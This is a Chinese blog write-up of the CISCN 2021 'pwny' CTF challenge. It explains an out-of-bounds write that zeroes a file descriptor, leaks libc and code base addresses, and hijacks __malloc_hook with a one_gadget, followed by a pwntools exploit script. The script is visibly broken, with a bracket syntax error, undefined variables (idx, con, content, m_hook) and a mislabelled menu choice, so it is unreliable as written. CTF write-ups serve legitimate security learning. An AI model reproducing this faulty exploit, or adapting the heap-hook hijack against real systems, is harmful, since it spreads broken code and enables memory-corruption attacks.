2021 ciscn 线上 pwn pwny

最新推荐文章于 2022-10-03 11:01:52 发布
最新推荐文章于 2022-10-03 11:01:52 发布
阅读量306 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/119545048
版权

在这里插入图片描述
保护拉满。

在这里插入图片描述
两个功能,read write

read
在这里插入图片描述
202860放了一个随机数。
在这里插入图片描述
read把随机数当作文件fd。

write
在这里插入图片描述也是一个read函数,fd是刚刚那个随机数。
但是这里的write显然index可以随便写,就会有个越界。

我们可以把fd文件号改成从文件中读出来的这个数,但是我们想让他为0,但是显然不大行,因为你不知道这个数是多少

当我们两次write的改fd,第一次fd改成一个比较大的数,第二次就会导致读取失败,所以v2的值不会变,利用的是这种巧妙的手法,来让fd等于0.

接下来就是利用read具有的show功能,找好bss和data上的数据泄露出来,我们就可以获取libc和代码基地址。最后就是利用scanf读取过长的输入时会分配chunk,也就是说会使用malloc_hook,此时就可以在malloc_hook处写入one_gadget。

exp

from pwn import *

r = process("./pwny"])
libc = ELF("./libc.so.6")

def write(index):
    r.sendlineafter("Your choice: ","2")
    r.sendlineafter("Index: ",str(idx))

def write_con(idx, content):
    r.sendlineafter("Your choice: ","2")
    r.sendlineafter("Index: ",str(idx))
    r.send(con)
    
def read(con):
    r.sendlineafter("Your choice: ","2")
    r.sendafter("Index: ",content)

write(256)
write(256)

read(p64(0xfffffffffffffffc))  
r.recvuntil("Result: ")
libc_base = int(r.recvuntil("\n", drop=True), 16)-libc.sym["_IO_2_1_stderr_"]
malloc_hook = libc_base+libc.sym["__malloc_hook"]
realloc = libc_base+libc.sym["realloc"]
one_gadget = libc_base + 0x4f365

read(p64(0xfffffffffffffff5)) 
r.recvuntil("Result: ")
code_base = int(r.recvuntil("\n", drop=True), 16)-0x202008
print("code base: ", hex(code_base))

offset = (m_hook-code_base-0x202060)/8

write_con(int(offset), p64(realloc+9))
write_con(int(offset-1), p64(one_gadget))
r.sendlineafter(":", "1"*0x400)  

r.interactive()
yongbaoii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3
arttnba3的博客
05-21 724
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3[GITHUB BLOG ADDR](https://arttnba3.cn/2021/05/15/CTF-0X04-CISCN2021-PRELIMINARY/)0x00.绪论0x01.场景实操 开场卷pwny | Donelonelywolf | Donechannel0x02.场景实操 二阶卷silverwolf | Donegame0x03.场景实操 冲刺卷satool GITHUB BLOG A
ciscn_2021_pwny.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
ciscn2021 pwn-pwny
z1r0的博客
05-16 427
ciscn2021 pwn-pwny 查看保护 程序初始化的时候fd取的是一个随机数 所以在程序运行的时候直接read的时候会出错,因为找的是无效内存。所我们需要将fd变成0就可以正常使用read这个东西了。 在这里有个很明显的漏洞,没有限制index,所以可以oob利用。 攻击思路:fd变成0才可以正常利用,看一下202060有什么地址可以让oob发挥作用。 fd刚好就在202060这里,所以我们直接利用oob将fd给覆盖成0。 fd为0之后可以正常的读地址了,借助read功能读取libc和pi
2021 ciscn 线上 pwn silverwolf
yongbaoii的博客
08-30 837
显然是全绿。 add 只能控制一个chunk,size也有限制。 edit 以回车结束。 这里有一个off by null。 show 就输出。 free 有个uaf。 其实比起lonelywolf来说就是开了个沙箱。 整个看下来,那个index就是那种逗你玩那种。 然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。 那想想怎么来利用那个uaf。 uaf,在得到libc的条件下,我们可以直接攻击free_h.
ciscn_2021_pwn_lonelywolf&silverwolf
weixin_49697396的博客
05-18 866
一、lonelywolf 构造double free泄露并打印堆地址,利用堆地址计算tcache_perthread_struct结构体地址 使用double free 攻击tcache_perthread_struct,修改count>7,并使得下一次申请到tcache_perthread_struct位置,并再次留下tcache_perthread_struct地址 利用tcache_perthread_struct的size free后会放入unsorted bin中,可以泄露出libc地
ciscn2021 pwn-lonelywolf
z1r0的博客
05-19 218
ciscn2021 pwn-lonelywolf 简单题 保护全开 有一个很明显的uaf漏洞 add还限制了大小 攻击思路:利用tcache struct attack来解决这一道题目,申请到tcache struct这里之后有两种方法来得到unsortedbin的块。 第一种是对struct进行绕过并释放,第二种是将申请的堆块伪造成0x91并释放。这里选择第二种。 因为tcache第一个bin满7个接下来就会fastbin或者进入其他的bin。所以我们改里面的0x91对应的counts为7,再利用ua
ciscn-2019-pwn
最新发布
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
ciscn_2021_lonelywolf.zip
05-17
lonelywolf.zip”这个文件名暗示了这是一个与2021年全国大学生信息安全竞赛相关的资源,其中“ciscn”可能代表了“Chinese Internet Security Contest”,而“lonelywolf”可能是该竞赛中某一题目或团队的代号,特别...
赣网杯2021_pwn1.rar
12-11
赣网杯2021 pwn1 bin ctf
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
ciscn2021CTF国赛pwn
qq_39948058的博客
08-27 1327
CTF2021-05-18 总结:这次pwn的比赛难易程度尚可,菜菜的我在各位师傅的领导下勉勉强强做出了3道pwn,这三道pwn都不算太难,一道越界,越界pwny这道题确实把我搞吐了,后期卡在了ret的与数组的偏移,这个不会计算,在th1un师傅的领导下,才知道了如何计算,勉强做出来了,值得说的是数组越界在2021年比赛中出现的越来越频繁了,是真的频繁了,第二道pwn是一个堆,只不过index受到了限制,既然index受到了限制并不影响我们在同一个index构造多个chunk,所以这个题也是常规操作.
2021 ciscn-pwn 初赛
csdn546229768的博客
06-05 563
2021全国大学生信息安全竞赛-pwny_init 分析 mainreadwrite这个程序其实就是两个核心函数,和名字一样,因为操作的fd指针是个随机参数文件,我们通过修改fd指针为0,也就是控制台就可以实现任意读写了,那么程序就简单了很简单我们看这个这里组的偏移是由我们决定的且没有大小限制(是int64类型的变量)。ok看看bss段qword_202060和随机函数的fd指针只相差0x100偏移,那么就可以间接的控制fd为0了,具体利用如下: 这里就可以将fd置为0,我也是gdb调试调试着就发现的,仔细
CISCN2021pwn pwny(数组越界,劫持exit_hook)
m0_51251108的博客
10-03 1158
CISCN2021pwn pwny(数组越界,劫持exit_hook)
2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分
热门推荐
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
pwny
wuyvle的博客
05-16 1036
这里read是从无符号数组开始读入,但是不能直接read否则会报错, 我们可以利用整数溢出来进行读入,多次爆破后利用printf泄露出环境和libc基值,然后我们可以任意地址读写 读个栈地址打通 from pwn import * context.log_level = 'debug' context.update(terminal=['tmux','splitw','-h']) p= remote() while (True): p.recvuntil('Your choi.
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2203
2022 CISCN 初赛pwn的完整wp
ciscn2021西北部分pwn
mishixiaodai的博客
05-16 1503
打了一天的国赛,发现自己还是太菜了 pwny 读取随机数到bss段上作为文件描述符范围在0~0xff之间,又在自定义的函数sub_ba0中发现可以根据偏移进行任意写的操作,sub_b20可以根据偏移进行任意读操作,因此就可以覆盖fd的值,爆破fd使其等于0,我们就可以进行任意读写 我们可以通过泄露出bss段上的stdout指针指向的_IO_2_1_stdout_的地址来泄露libc的基地址,在通过泄露data段上的off_202008来泄露bss段上的地址,再通过libc上的environ来泄露栈地址。
CISCN 2018 PWN task_supermarket
Bill
04-29 1629
全国大学生信息安全竞赛-PWN 序言 第一次在大赛中做出PWN题, 心情有点小激动. 程序运行 0. 结构体 struct node{ char name[16]; int price; int size; char* des; }commodity[15]; 1.MENU 1. add a commodity 2. del a...
2019CISCN华南赛区半决赛 pwn
qq_41071646的博客
12-09 848
好久没有练过pwn了,, 感觉自己pwn 都废了,, 近期打算刷一下攻防世界的android 然后 刷刷这个华南赛区的pwn。 如果刷的差不多 打算继续刷buuoj 。暂时把自己会的刷完。。 pwn1 这个题目真的很有意思 感觉出题人费心了 edit 函数已经给限制了 然后show 函数也限制了 edit 函数????️一个 off by null 由于没有开pie un...
二进制利用入门:Pwn挑战解析
"Introduction-to-Pwn.pdf - pwn学习手册" 在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值